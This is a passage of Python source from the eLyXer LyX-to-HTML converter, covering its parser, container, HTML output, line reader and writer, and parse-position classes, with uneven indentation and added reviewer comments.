Trace.error('    --nocopy:               (deprecated) maintained for backwards compatibility')
Trace.error('    --jsmath "URL":         use jsMath from the given URL to display equations')
sys.exit()
def showversion(self):
"Return the current eLyXer version string"
string = 'eLyXer version ' + GeneralConfig.version['number']
string += ' (' + GeneralConfig.version['date'] + ')'
Trace.error(string)
sys.exit()
def showhardversion(self):
"Return just the version string"
Trace.message(GeneralConfig.version['number'])
sys.exit()
def showversiondate(self):
"Return just the version dte"
Trace.message(GeneralConfig.version['date'])
sys.exit()
def showlyxformat(self):
"Return just the lyxformat parameter"
Trace.message(GeneralConfig.version['lyxformat'])
sys.exit()
class BranchOptions(object):
    "Runtime options attached to a single LyX branch."

    def __init__(self, name):
        "Start out with the branch name and a default white color."
        self.name = name
        self.options = {'color':'#ffffff'}

    def set(self, key, value):
        "Store one branch option; the key must carry the command prefix."
        prefix = ContainerConfig.string['startcommand']
        if not key.startswith(prefix):
            Trace.error('Invalid branch option ' + key)
            return
        self.options[key.replace(prefix, '')] = value

    def isselected(self):
        "Tell whether this branch was selected for output."
        return self.options.get('selected') == '1'

    def __unicode__(self):
        "String representation"
        return 'options for ' + self.name + ': ' + unicode(self.options)

    if sys.version_info >= (3, 0):
        __str__ = __unicode__
class Cloner(object):
    "Utility to produce fresh copies of objects."

    @classmethod
    def clone(cls, original):
        """Return a new instance of the same class as *original*.

        The original's class must have a no-argument constructor.
        """
        return cls.create(original.__class__)

    @classmethod
    def create(cls, type):
        "Instantiate an object of the given class via __new__ + __init__."
        instance = type.__new__(type)
        instance.__init__()
        return instance
class ContainerExtractor(object):
    """Extracts a selection of containers from a container tree.

    The config map holds three lists of container class names:
    'allowed' containers go into the result as they are, 'cloned'
    containers are copied (with safe contents only), 'extracted'
    containers are descended into, and anything else is dropped
    with an error trace.
    """

    def __init__(self, config):
        "Keep the three class-name lists from the config map."
        self.allowed = config['allowed']
        self.cloned = config['cloned']
        self.extracted = config['extracted']

    def extract(self, container):
        "Extract the group of selected containers from a container."
        found = []
        def locate(candidate):
            return candidate.__class__.__name__ in self.allowed + self.cloned
        def recursive(candidate):
            return candidate.__class__.__name__ in self.extracted
        def handle(candidate):
            self.process(candidate, found)
        container.recursivesearch(locate, recursive, handle)
        return found

    def process(self, container, list):
        "Append allowed containers as-is; append a safe clone for cloned ones."
        name = container.__class__.__name__
        if name in self.allowed:
            list.append(container)
        elif name in self.cloned:
            list.append(self.safeclone(container))
        else:
            Trace.error('Unknown container class ' + name)

    def safeclone(self, container):
        "Return a copy whose contents are restricted to the safe lists."
        duplicate = Cloner.clone(container)
        duplicate.output = container.output
        duplicate.contents = self.extract(container)
        return duplicate
# Base class for all LyX-source parsers. Works against a line reader object
# providing currentline()/nextline()/linenumber. Subclasses (or the factory)
# are expected to set self.ending, self.factory and self.parent — TODO
# confirm where each is assigned; they are not set in this class.
class Parser(object):
"A generic parser"
def __init__(self):
# begin: line number where the parsed element starts;
# parameters: "key value" and XML-style parameters read from the input.
self.begin = 0
self.parameters = dict()
def parseheader(self, reader):
# Splits the current line into whitespace-separated header tokens and
# advances past it, remembering the line number.
"Parse the header"
header = reader.currentline().split()
reader.nextline()
self.begin = reader.linenumber
return header
def parseparameter(self, reader):
# A parameter line is either XML-like ('<param attr=...>'), a lone key
# (stored as True), 'key value', or 'key "quoted value"'.
"Parse a parameter"
if reader.currentline().strip().startswith('<'):
key, value = self.parsexml(reader)
self.parameters[key] = value
return
split = reader.currentline().strip().split(' ', 1)
reader.nextline()
if len(split) == 0:
return
key = split[0]
if len(split) == 1:
self.parameters[key] = True
return
if not '"' in split[1]:
self.parameters[key] = split[1].strip()
return
doublesplit = split[1].split('"')
self.parameters[key] = doublesplit[1]
def parsexml(self, reader):
"Parse a parameter in xml form: <param attr1=value...>"
strip = reader.currentline().strip()
reader.nextline()
if not strip.endswith('>'):
Trace.error('XML parameter ' + strip + ' should be <...>')
split = strip[1:-1].split()
if len(split) == 0:
Trace.error('Empty XML parameter <>')
return None, None
key = split[0]
del split[0]
if len(split) == 0:
return key, dict()
attrs = dict()
for attr in split:
if not '=' in attr:
Trace.error('Erroneous attribute for ' + key + ': ' + attr)
attr += '="0"'
# NOTE(review): an attribute with '=' but no quoted value (e.g. a=5)
# makes split('"')[1] raise IndexError — confirm inputs always quote.
parts = attr.split('=')
attrkey = parts[0]
value = parts[1].split('"')[1]
attrs[attrkey] = value
return key, attrs
def parseending(self, reader, process):
# Calls process() repeatedly until the current line starts with
# self.ending; process must advance the reader or this loops forever.
"Parse until the current ending is found"
if not self.ending:
Trace.error('No ending for ' + unicode(self))
return
while not reader.currentline().startswith(self.ending):
process()
def parsecontainer(self, reader, contents):
# Asks the factory (set externally) for the next container and links it
# to self.parent — TODO confirm who sets self.factory/self.parent.
container = self.factory.createcontainer(reader)
if container:
container.parent = self.parent
contents.append(container)
def __unicode__(self):
"Return a description"
return self.__class__.__name__ + ' (' + unicode(self.begin) + ')'
if sys.version_info >= (3, 0):
__str__ = __unicode__
class LoneCommand(Parser):
    "Parses a command that stands alone on its line."

    def parse(self, reader):
        "Nothing to read: the command line itself is the whole element."
        return []
# Parses a command followed by running text, tracking nested endings.
# CAUTION: 'stack' is a class-level list shared by every TextParser
# instance; isending() mutates (or wholesale resets) it.
class TextParser(Parser):
"A parser for a command and a bit of text"
stack = []
def __init__(self, container):
# Look up the ending token for this container type, if it has one.
Parser.__init__(self)
self.ending = None
if container.__class__.__name__ in ContainerConfig.endings:
self.ending = ContainerConfig.endings[container.__class__.__name__]
self.endings = []
def parse(self, reader):
# Push our ending onto the shared stack, then accept any pending ending
# plus the generic Layout/Inset endings as terminators.
"Parse lines as long as they are text"
TextParser.stack.append(self.ending)
self.endings = TextParser.stack + [ContainerConfig.endings['Layout'],
ContainerConfig.endings['Inset'], self.ending]
contents = []
while not self.isending(reader):
self.parsecontainer(reader, contents)
return contents
def isending(self, reader):
# The first token of the line decides; a match from the shared stack is
# popped, any other match clears the whole stack.
"Check if text is ending"
current = reader.currentline().split()
if len(current) == 0:
return False
if current[0] in self.endings:
if current[0] in TextParser.stack:
TextParser.stack.remove(current[0])
else:
TextParser.stack = []
return True
return False
class ExcludingParser(Parser):
    "A parser that stops just before the final line."

    def parse(self, reader):
        "Collect containers until the ending line, leaving it unread."
        contents = []
        def addcontainer():
            self.parsecontainer(reader, contents)
        self.parseending(reader, addcontainer)
        return contents
class BoundedParser(ExcludingParser):
    "A parser delimited by a final line, which it consumes."

    def parse(self, reader):
        "Read everything up to the ending line, then skip that line too."
        contents = ExcludingParser.parse(self, reader)
        # consume the ending line itself
        reader.nextline()
        return contents
class BoundedDummy(Parser):
    "A bounded parser that discards everything it reads."

    def parse(self, reader):
        "Skip every line up to and including the ending line."
        self.parseending(reader, reader.nextline)
        # consume the ending line itself
        reader.nextline()
        return []
class StringParser(Parser):
    "Parses a plain string line."

    def parseheader(self, reader):
        "There is no header: just record where the string starts."
        self.begin = reader.linenumber + 1
        return []

    def parse(self, reader):
        "Return the current line as the contents and move past it."
        line = reader.currentline()
        reader.nextline()
        return line
class InsetParser(BoundedParser):
    "Parses a LyX inset."

    def parse(self, reader):
        "Read leading 'key value' parameters, then the bounded contents."
        startcommand = ContainerConfig.string['startcommand']
        line = reader.currentline()
        while line != '' and not line.startswith(startcommand):
            self.parseparameter(reader)
            line = reader.currentline()
        return BoundedParser.parse(self, reader)
class ContainerOutput(object):
    "Base class for the HTML output of a container."

    def gethtml(self, container):
        "Subclasses must override this; complain otherwise."
        Trace.error('gethtml() not implemented for ' + unicode(self))

    def isempty(self):
        "By default an output is considered non-empty."
        return False
class EmptyOutput(ContainerOutput):
    "An output that produces nothing at all."

    def gethtml(self, container):
        "Return empty HTML code."
        return []

    def isempty(self):
        "This output is always empty."
        return True
class FixedOutput(ContainerOutput):
    "Outputs the constant HTML stored on the container itself."

    def gethtml(self, container):
        "Hand back the container's prebuilt html attribute."
        return container.html
class ContentsOutput(ContainerOutput):
    "Outputs the contents of a container converted to HTML."

    def gethtml(self, container):
        """Concatenate the HTML of every element in container.contents.

        If an element without a gethtml() method is found, an error is
        traced and the lines collected so far are returned.
        """
        html = []
        # 'is None' instead of '== None': singleton comparison per PEP 8,
        # and avoids triggering any custom __eq__ on the contents object.
        if container.contents is None:
            return html
        for element in container.contents:
            if not hasattr(element, 'gethtml'):
                Trace.error('No html in ' + element.__class__.__name__ + ': ' + unicode(element))
                return html
            html += element.gethtml()
        return html
class TaggedOutput(ContentsOutput):
    "Outputs the contents of a container wrapped in an HTML tag."

    tag = None          # full tag text, possibly including attributes
    breaklines = False  # whether to surround the tag with newlines
    empty = False       # whether to render a self-closing tag

    def settag(self, tag, breaklines=False, empty=False):
        "Configure the tag; only truthy flags overwrite the defaults."
        self.tag = tag
        if breaklines:
            self.breaklines = breaklines
        if empty:
            self.empty = empty
        return self

    def setbreaklines(self, breaklines):
        "Set the value for breaklines."
        self.breaklines = breaklines
        return self

    def gethtml(self, container):
        "Return the HTML code."
        if self.empty:
            return [self.selfclosing(container)]
        result = [self.open(container)]
        result += ContentsOutput.gethtml(self, container)
        result.append(self.close(container))
        return result

    def open(self, container):
        "Get the opening line."
        if not self.checktag(container):
            return ''
        line = '<' + self.tag + '>'
        if self.breaklines:
            line += '\n'
        return line

    def close(self, container):
        "Get the closing line."
        if not self.checktag(container):
            return ''
        line = '</' + self.tag.split()[0] + '>'
        if self.breaklines:
            line = '\n' + line + '\n'
        return line

    def selfclosing(self, container):
        "Get the self-closing line."
        if not self.checktag(container):
            return ''
        line = '<' + self.tag + '/>'
        if self.breaklines:
            line += '\n'
        return line

    def checktag(self, container):
        "Check that a valid tag has been set."
        if not self.tag:
            Trace.error('No tag in ' + unicode(container))
            return False
        # unreachable in practice ('' is already falsy); kept for parity
        if self.tag == '':
            return False
        return True
class FilteredOutput(ContentsOutput):
  "Produces the contents' HTML with string substitutions applied to every line."
  def __init__(self):
    "Start out with no substitutions registered."
    self.filters = []
  def addfilter(self, original, replacement):
    "Register a substitution from original to replacement."
    self.filters.append((original, replacement))
  def gethtml(self, container):
    "Return the contents' HTML, filtering each line."
    html = ContentsOutput.gethtml(self, container)
    return [self.filter(line) for line in html]
  def filter(self, line):
    "Apply every registered substitution to a single line."
    for original, replacement in self.filters:
      if original in line:
        line = line.replace(original, replacement)
    return line
class StringOutput(ContainerOutput):
  "Wraps the container's plain string as its whole output."
  def gethtml(self, container):
    "Return the container's string inside a one-element list."
    return [container.string]
class LineReader(object):
  "Reads a file line by line"
  def __init__(self, filename):
    # accept either an already open file object or a file name to open as UTF-8
    # NOTE(review): the `file` builtin only exists on Python 2 — presumably a
    # py3 compatibility shim defines it elsewhere in this module; confirm
    if isinstance(filename, file):
      self.file = filename
    else:
      self.file = codecs.open(filename, 'rU', 'utf-8')
    self.linenumber = 1      # number of the line about to be served
    self.lastline = None     # optional last line to read (see setend)
    self.current = None      # text of the current line, newline stripped
    self.mustread = True     # True when the next access must pull a fresh line
    self.depleted = False    # True once the end of the file has been reached
    try:
      self.readline()
    except UnicodeDecodeError:
      # try compressed file
      import gzip
      self.file = gzip.open(filename, 'rb')
      self.readline()
  def setstart(self, firstline):
    "Set the first line to read."
    # skip lines directly on the underlying file, then sync the counter
    for i in range(firstline):
      self.file.readline()
    self.linenumber = firstline
  def setend(self, lastline):
    "Set the last line to read."
    self.lastline = lastline
  def currentline(self):
    "Get the current line"
    if self.mustread:
      self.readline()
    return self.current
  def nextline(self):
    "Go to next line"
    if self.depleted:
      Trace.fatal('Read beyond file end')
    # lazily: the actual read happens on the next currentline()/finished()
    self.mustread = True
  def readline(self):
    "Read a line from elyxer.file"
    self.current = self.file.readline()
    # gzip (and any non-codecs stream) yields bytes that must be decoded
    if not isinstance(self.file, codecs.StreamReaderWriter):
      self.current = self.current.decode('utf-8')
    # an empty read (not even a newline) signals end of file
    if len(self.current) == 0:
      self.depleted = True
    self.current = self.current.rstrip('\n\r')
    self.linenumber += 1
    self.mustread = False
    Trace.prefix = 'Line ' + unicode(self.linenumber) + ': '
    # emit a progress heartbeat every 1000 lines
    if self.linenumber % 1000 == 0:
      Trace.message('Parsing')
  def finished(self):
    "Find out if the file is finished"
    # an explicit end line takes precedence over physical end of file
    if self.lastline and self.linenumber == self.lastline:
      return True
    if self.mustread:
      self.readline()
    return self.depleted
  def close(self):
    "Close the underlying file."
    self.file.close()
class LineWriter(object):
  "Writes a file as a series of lists"
  # the open file object; False until the first write (lazy open)
  file = False
  def __init__(self, filename):
    # accept either an already open file object or a file name
    # NOTE(review): `file` is the Python 2 builtin — presumably shimmed for py3
    if isinstance(filename, file):
      self.file = filename
      self.filename = None
    else:
      self.filename = filename
  def write(self, strings):
    "Write a list of strings"
    for string in strings:
      if not isinstance(string, basestring):
        # abort the whole batch on the first non-string element
        Trace.error('Not a string: ' + unicode(string) + ' in ' + unicode(strings))
        return
      self.writestring(string)
  def writestring(self, string):
    "Write a string"
    # open the destination lazily on first write
    if not self.file:
      self.file = codecs.open(self.filename, 'w', "utf-8")
    # Python 2 stdout expects encoded bytes, not unicode
    if self.file == sys.stdout and sys.version_info < (3, 0):
      string = string.encode('utf-8')
    self.file.write(string)
  def writeline(self, line):
    "Write a line to file"
    self.writestring(line + '\n')
  def close(self):
    "Close the underlying file."
    self.file.close()
class Globable(object):
  """A bit of text which can be globbed (lumped together in bits).
  Methods current(), skipcurrent(), checkfor() and isout() have to be
  implemented by subclasses."""
  # when True, unclosed endings at end of input are tolerated silently
  leavepending = False
  def __init__(self):
    self.endinglist = EndingList()
  def checkbytemark(self):
    "Check for a Unicode byte mark and skip it."
    if self.finished():
      return
    # U+FEFF is the byte-order mark
    if ord(self.current()) == 0xfeff:
      self.skipcurrent()
  def isout(self):
    "Find out if we are out of the position yet."
    Trace.error('Unimplemented isout()')
    return True
  def current(self):
    "Return the current character."
    Trace.error('Unimplemented current()')
    return ''
  def checkfor(self, string):
    "Check for the given string in the current position."
    Trace.error('Unimplemented checkfor()')
    return False
  def finished(self):
    "Find out if the current text has finished."
    if self.isout():
      # reaching physical end with endings still open is an error,
      # unless leavepending explicitly allows it
      if not self.leavepending:
        self.endinglist.checkpending()
      return True
    # also finished when the current position matches a pushed ending
    return self.endinglist.checkin(self)
  def skipcurrent(self):
    "Return the current character and skip it."
    Trace.error('Unimplemented skipcurrent()')
    return ''
  def glob(self, currentcheck):
    "Glob a bit of text that satisfies a check on the current char."
    glob = ''
    while not self.finished() and currentcheck():
      glob += self.skipcurrent()
    return glob
  def globalpha(self):
    "Glob a bit of alpha text"
    return self.glob(lambda: self.current().isalpha())
  def globnumber(self):
    "Glob a row of digits."
    return self.glob(lambda: self.current().isdigit())
  def isidentifier(self):
    "Return if the current character is alphanumeric or _."
    if self.current().isalnum() or self.current() == '_':
      return True
    return False
  def globidentifier(self):
    "Glob alphanumeric and _ symbols."
    return self.glob(self.isidentifier)
  def isvalue(self):
    "Return if the current character is a value character:"
    "not a bracket or a space."
    if self.current().isspace():
      return False
    if self.current() in '{}()':
      return False
    return True
  def globvalue(self):
    "Glob a value: any symbols but brackets."
    return self.glob(self.isvalue)
  def skipspace(self):
    "Skip all whitespace at current position."
    return self.glob(lambda: self.current().isspace())
  def globincluding(self, magicchar):
    "Glob a bit of text up to (including) the magic char."
    glob = self.glob(lambda: self.current() != magicchar) + magicchar
    self.skip(magicchar)
    return glob
  def globexcluding(self, excluded):
    "Glob a bit of text up until (excluding) any excluded character."
    return self.glob(lambda: self.current() not in excluded)
  def pushending(self, ending, optional = False):
    "Push a new ending to the bottom"
    self.endinglist.add(ending, optional)
  def popending(self, expected = None):
    "Pop the ending found at the current position"
    # at physical end with leavepending set, pretend the ending was found
    if self.isout() and self.leavepending:
      return expected
    ending = self.endinglist.pop(self)
    if expected and expected != ending:
      Trace.error('Expected ending ' + expected + ', got ' + ending)
    # consume the ending characters from the input
    self.skip(ending)
    return ending
  def nextending(self):
    "Return the next ending in the queue."
    nextending = self.endinglist.findending(self)
    if not nextending:
      return None
    return nextending.ending
class EndingList(object):
  "A list of position endings"
  def __init__(self):
    self.endings = []
  def add(self, ending, optional = False):
    "Add a new ending to the list"
    self.endings.append(PositionEnding(ending, optional))
  def pickpending(self, pos):
    "Pick any pending endings from a parse position."
    self.endings += pos.endinglist.endings
  def checkin(self, pos):
    "Return whether an ending matches at the given position."
    if self.findending(pos):
      return True
    return False
  def pop(self, pos):
    "Remove the ending at the current position"
    if pos.isout():
      Trace.error('No ending out of bounds')
      return ''
    ending = self.findending(pos)
    if not ending:
      Trace.error('No ending at ' + pos.current())
      return ''
    # discard endings from the innermost outwards until the match is reached
    for each in reversed(self.endings):
      self.endings.remove(each)
      if each == ending:
        return each.ending
      elif not each.optional:
        # wrap in unicode(): concatenating the PositionEnding object
        # directly raised a TypeError whenever this branch was hit
        Trace.error('Removed non-optional ending ' + unicode(each))
    Trace.error('No endings left')
    return ''
  def findending(self, pos):
    "Find the ending at the current position"
    if len(self.endings) == 0:
      return None
    # search innermost-first; a non-matching mandatory ending stops the search
    for ending in reversed(self.endings):
      if ending.checkin(pos):
        return ending
      if not ending.optional:
        return None
    return None
  def checkpending(self):
    "Check if there are any pending endings"
    if len(self.endings) != 0:
      Trace.error('Pending ' + unicode(self) + ' left open')
  def __unicode__(self):
    "Printable representation"
    string = 'endings ['
    for ending in self.endings:
      string += unicode(ending) + ','
    # drop the trailing comma, if any endings were listed
    if len(self.endings) > 0:
      string = string[:-1]
    return string + ']'
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class PositionEnding(object):
  "A single ending expected at a parsing position."
  def __init__(self, ending, optional):
    "Store the ending string and whether it is optional."
    self.ending = ending
    self.optional = optional
  def checkin(self, pos):
    "Return whether the position currently sits at this ending."
    return pos.checkfor(self.ending)
  def __unicode__(self):
    "Printable representation"
    result = 'Ending ' + self.ending
    if self.optional:
      result += ' (optional)'
    return result
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class Position(Globable):
  """A position in a text to parse.
  Including those in Globable, functions to implement by subclasses are:
  skip(), identifier(), extract(), isout() and current()."""
  def __init__(self):
    Globable.__init__(self)
  def skip(self, string):
    "Skip a string"
    Trace.error('Unimplemented skip()')
  def identifier(self):
    "Return an identifier for the current position."
    Trace.error('Unimplemented identifier()')
    return 'Error'
  def extract(self, length):
    "Extract the next string of the given length, or None if not enough text,"
    "without advancing the parse position."
    Trace.error('Unimplemented extract()')
    return None
  def checkfor(self, string):
    "Check for a string at the given position."
    return string == self.extract(len(string))
  def checkforlower(self, string):
    "Check for a string at the given position, case-insensitively."
    extracted = self.extract(len(string))
    if not extracted:
      return False
    # reuse the text already extracted instead of extracting it a second time
    return string.lower() == extracted.lower()
  def skipcurrent(self):
    "Return the current character and skip it."
    current = self.current()
    self.skip(current)
    return current
  def __next__(self):
    "Advance the position and return the next character."
    self.skipcurrent()
    return self.current()
  if sys.version_info < (3, 0):
    # Python 2 iterator protocol uses next() instead of __next__()
    next = __next__
  def checkskip(self, string):
    "Check for a string at the given position; if there, skip it"
    if not self.checkfor(string):
      return False
    self.skip(string)
    return True
  def error(self, message):
    "Show an error message and the position identifier."
    Trace.error(message + ': ' + self.identifier())
class TextPosition(Position):
  "A parse position over an in-memory string."
  def __init__(self, text):
    "Start parsing at the beginning of the given text."
    Position.__init__(self)
    self.pos = 0
    self.text = text
    self.checkbytemark()
  def skip(self, string):
    "Advance the position by the length of the string."
    self.pos += len(string)
  def identifier(self):
    "Return a sample of the remaining text, delimited by asterisks."
    length = min(30, len(self.text) - self.pos)
    return '*' + self.text[self.pos:self.pos + length] + '*'
  def isout(self):
    "Report whether the whole text has been consumed."
    return self.pos >= len(self.text)
  def current(self):
    "Return the current character, assuming we are not out."
    return self.text[self.pos]
  def extract(self, length):
    "Extract the next string of the given length, or None if not enough text."
    if self.pos + length > len(self.text):
      return None
    return self.text[self.pos : self.pos + length]
class FilePosition(Position):
  "A parse position based on an underlying file."
  def __init__(self, filename):
    "Create the position from a file."
    Position.__init__(self)
    self.reader = LineReader(filename)
    self.pos = 0
    self.checkbytemark()
  def skip(self, string):
    "Skip a string of characters."
    length = len(string)
    # the string may span several lines; consume whole lines as needed
    # (the +1 accounts for the newline stripped from each stored line)
    while self.pos + length > len(self.reader.currentline()):
      length -= len(self.reader.currentline()) - self.pos + 1
      self.nextline()
    self.pos += length
  def currentline(self):
    "Get the current line of the underlying file."
    return self.reader.currentline()
  def nextline(self):
    "Go to the next line."
    self.reader.nextline()
    self.pos = 0
  def linenumber(self):
    "Return the line number of the file."
    return self.reader.linenumber + 1
  def identifier(self):
    "Return the current line and line number in the file."
    before = self.reader.currentline()[:self.pos - 1]
    after = self.reader.currentline()[self.pos:]
    # fixed: the original called self.getlinenumber(), a method that does not
    # exist on this class (the accessor is linenumber()), raising AttributeError
    return 'line ' + unicode(self.linenumber()) + ': ' + before + '*' + after
  def isout(self):
    "Find out if we are out of the text yet."
    if self.pos > len(self.reader.currentline()):
      if self.pos > len(self.reader.currentline()) + 1:
        Trace.error('Out of the line ' + self.reader.currentline() + ': ' + unicode(self.pos))
      self.nextline()
    return self.reader.finished()
  def current(self):
    "Return the current character, assuming we are not out."
    # position right past the stored line stands for the stripped newline
    if self.pos == len(self.reader.currentline()):
      return '\n'
    if self.pos > len(self.reader.currentline()):
      Trace.error('Out of the line ' + self.reader.currentline() + ': ' + unicode(self.pos))
      return '*'
    return self.reader.currentline()[self.pos]
  def extract(self, length):
    "Extract the next string of the given length, or None if not enough text."
    if self.pos + length > len(self.reader.currentline()):
      return None
    return self.reader.currentline()[self.pos : self.pos + length]
class Container(object):
  "A container for text and objects in a lyx file"
  # part key for numbering/labeling; set externally when applicable
  partkey = None
  # enclosing container, or None at the top level
  parent = None
  # line number where this container started, if known
  begin = None
  def __init__(self):
    self.contents = list()
  def process(self):
    "Process contents"
    pass
  def gethtml(self):
    "Get the resulting HTML"
    html = self.output.gethtml(self)
    # outputs must return lists of lines; tolerate (but report) a raw string
    if isinstance(html, basestring):
      Trace.error('Raw string ' + html)
      html = [html]
    return self.escapeall(html)
  def escapeall(self, lines):
    "Escape all lines in an array according to the output options."
    result = []
    for line in lines:
      if Options.html:
        line = self.escape(line, EscapeConfig.html)
      if Options.iso885915:
        line = self.escape(line, EscapeConfig.iso885915)
        line = self.escapeentities(line)
      elif not Options.unicode:
        line = self.escape(line, EscapeConfig.nonunicode)
      result.append(line)
    return result
  def escape(self, line, replacements = EscapeConfig.entities):
    # NOTE: the default replacements map is evaluated once, at class creation
    "Escape a line with replacements from elyxer.a map"
    pieces = sorted(replacements.keys())
    # do them in order
    for piece in pieces:
      if piece in line:
        line = line.replace(piece, replacements[piece])
    return line
  def escapeentities(self, line):
    "Escape all Unicode characters to HTML entities."
    result = ''
    pos = TextPosition(line)
    while not pos.finished():
      # characters above ASCII become numeric entities
      if ord(pos.current()) > 128:
        codepoint = hex(ord(pos.current()))
        # 0xd835 looks like a UTF-16 high surrogate; the next character is
        # combined with an offset to recover the real codepoint — TODO confirm
        if codepoint == '0xd835':
          codepoint = hex(ord(next(pos)) + 0xf800)
        result += '&#' + codepoint[1:] + ';'
      else:
        result += pos.current()
      pos.skipcurrent()
    return result
  def searchall(self, type):
    "Search for all embedded containers of a given type"
    list = []
    self.searchprocess(type, lambda container: list.append(container))
    return list
  def searchremove(self, type):
    "Search for all containers of a type and remove them"
    list = self.searchall(type)
    for container in list:
      container.parent.contents.remove(container)
    return list
  def searchprocess(self, type, process):
    "Search for elements of a given type and process them"
    self.locateprocess(lambda container: isinstance(container, type), process)
  def locateprocess(self, locate, process):
    "Search for all embedded containers and process them"
    # depth-first: children are processed before the container itself
    for container in self.contents:
      container.locateprocess(locate, process)
      if locate(container):
        process(container)
  def recursivesearch(self, locate, recursive, process):
    "Perform a recursive search in the container."
    # only descend into containers for which recursive() returns True
    for container in self.contents:
      if recursive(container):
        container.recursivesearch(locate, recursive, process)
      if locate(container):
        process(container)
  def extracttext(self):
    "Extract all text from elyxer.allowed containers."
    result = ''
    constants = ContainerExtractor(ContainerConfig.extracttext).extract(self)
    for constant in constants:
      result += constant.string
    return result
  def group(self, index, group, isingroup):
    "Group some adjoining elements into a group"
    if index >= len(self.contents):
      return
    # never re-group an element that already belongs to a group
    if hasattr(self.contents[index], 'grouped'):
      return
    while index < len(self.contents) and isingroup(self.contents[index]):
      self.contents[index].grouped = True
      group.contents.append(self.contents[index])
      self.contents.pop(index)
    self.contents.insert(index, group)
  def remove(self, index):
    "Remove a container but leave its contents"
    container = self.contents[index]
    self.contents.pop(index)
    # splice the removed container's children back in at the same spot
    while len(container.contents) > 0:
      self.contents.insert(index, container.contents.pop())
  def tree(self, level = 0):
    "Show in a tree"
    Trace.debug(" " * level + unicode(self))
    for container in self.contents:
      container.tree(level + 1)
  def getparameter(self, name):
    "Get the value of a parameter, if present."
    if not name in self.parameters:
      return None
    return self.parameters[name]
  def getparameterlist(self, name):
    "Get the value of a comma-separated parameter as a list."
    paramtext = self.getparameter(name)
    if not paramtext:
      return []
    return paramtext.split(',')
  def hasemptyoutput(self):
    "Check if the parent's output is empty."
    # walk up the ancestry; any empty ancestor silences this container
    current = self.parent
    while current:
      if current.output.isempty():
        return True
      current = current.parent
    return False
  def __unicode__(self):
    "Get a description"
    if not self.begin:
      return self.__class__.__name__
    return self.__class__.__name__ + '@' + unicode(self.begin)
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class BlackBox(Container):
  "A container that does not output anything"
  def __init__(self):
    "Parse a lone command and emit nothing."
    self.parser = LoneCommand()
    self.output = EmptyOutput()
    self.contents = []
class LyXFormat(BlackBox):
  "Read the lyxformat command"
  def process(self):
    "Show warning if version < 276"
    # self.header is presumably filled by the parser; header[1] holds the
    # format number — TODO confirm against the parser that sets it
    version = int(self.header[1])
    if version < 276:
      Trace.error('Warning: unsupported old format version ' + str(version))
    # also warn when the document is newer than the supported format
    if version > int(GeneralConfig.version['lyxformat']):
      Trace.error('Warning: unsupported new format version ' + str(version))
class StringContainer(Container):
  "A container for a single string"
  # raw parsed text, consumed (and cleared) by process()
  parsed = None
  def __init__(self):
    self.parser = StringParser()
    self.output = StringOutput()
    self.string = ''
  def process(self):
    "Replace special chars from elyxer.the contents."
    if self.parsed:
      self.string = self.replacespecial(self.parsed)
      self.parsed = None
  def replacespecial(self, line):
    "Replace all special chars from elyxer.a line"
    replaced = self.escape(line, EscapeConfig.entities)
    replaced = self.changeline(replaced)
    # anything still containing the command-start marker was not recognized
    if ContainerConfig.string['startcommand'] in replaced and len(replaced) > 1:
      # unprocessed commands
      if self.begin:
        message = 'Unknown command at ' + unicode(self.begin) + ': '
      else:
        message = 'Unknown command: '
      Trace.error(message + replaced.strip())
    return replaced
  def changeline(self, line):
    "Escape special characters, and commands when a command marker is present."
    line = self.escape(line, EscapeConfig.chars)
    if not ContainerConfig.string['startcommand'] in line:
      return line
    line = self.escape(line, EscapeConfig.commands)
    return line
  def extracttext(self):
    "Return all text."
    return self.string
  def __unicode__(self):
    "Return a printable representation."
    result = 'StringContainer'
    if self.begin:
      result += '@' + unicode(self.begin)
    # truncate long strings to 15 characters with an ellipsis
    ellipsis = '...'
    if len(self.string.strip()) <= 15:
      ellipsis = ''
    return result + ' (' + self.string.strip()[:15] + ellipsis + ')'
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class Constant(StringContainer):
  "A container holding one fixed string."
  def __init__(self, text):
    "Wrap the given text as the constant's string."
    self.output = StringOutput()
    self.string = text
    self.contents = []
  def __unicode__(self):
    "Printable representation."
    return 'Constant: ' + self.string
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class TaggedText(Container):
  "Text inside a tag"
  output = None
  def __init__(self):
    "Create the text parser and a tagged output with no tag yet."
    self.parser = TextParser(self)
    self.output = TaggedOutput()
  def complete(self, contents, tag, breaklines=False):
    "Complete the tagged text and return it"
    self.contents = contents
    self.output.tag = tag
    self.output.breaklines = breaklines
    return self
  def constant(self, text, tag, breaklines=False):
    "Complete the tagged text with a constant"
    constant = Constant(text)
    return self.complete([constant], tag, breaklines)
  def __unicode__(self):
    "Return a printable representation."
    if not hasattr(self.output, 'tag'):
      # fixed typo: was 'Emtpy tagged text'
      return 'Empty tagged text'
    if not self.output.tag:
      return 'Tagged <unknown tag>'
    return 'Tagged <' + self.output.tag + '>'
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class DocumentParameters(object):
  "Global parameters for the document."
  # title used for the output metadata — TODO confirm against the writer
  pdftitle = None
  # whether standard paragraphs are indented — presumably from the LyX header
  indentstandard = False
  # maximum depth shown in the table of contents — TODO confirm
  tocdepth = 10
  # starting heading level offset — TODO confirm
  startinglevel = 0
  # maximum nesting depth considered — TODO confirm
  maxdepth = 10
  # document language, if declared
  language = None
  # bibliography style or data, if declared
  bibliography = None
  # whether to output tracked changes — TODO confirm
  outputchanges = False
  # True while processing a display (non-inline) formula; set in Formula.process
  displaymode = False
class FormulaParser(Parser):
  "Parses a formula"
  def parseheader(self, reader):
    "See if the formula is inlined"
    self.begin = reader.linenumber + 1
    type = self.parsetype(reader)
    # the type marker may be on the following line
    if not type:
      reader.nextline()
      type = self.parsetype(reader)
      if not type:
        Trace.error('Unknown formula type in ' + reader.currentline().strip())
        return ['unknown']
    return [type]
  def parsetype(self, reader):
    "Get the formula type from the first line."
    if reader.currentline().find(FormulaConfig.starts['simple']) >= 0:
      return 'inline'
    if reader.currentline().find(FormulaConfig.starts['complex']) >= 0:
      return 'block'
    if reader.currentline().find(FormulaConfig.starts['unnumbered']) >= 0:
      return 'block'
    if reader.currentline().find(FormulaConfig.starts['beginbefore']) >= 0:
      return 'numbered'
    return None
  def parse(self, reader):
    "Parse the formula until the end"
    formula = self.parseformula(reader)
    # skip (and report) anything left before the ending marker
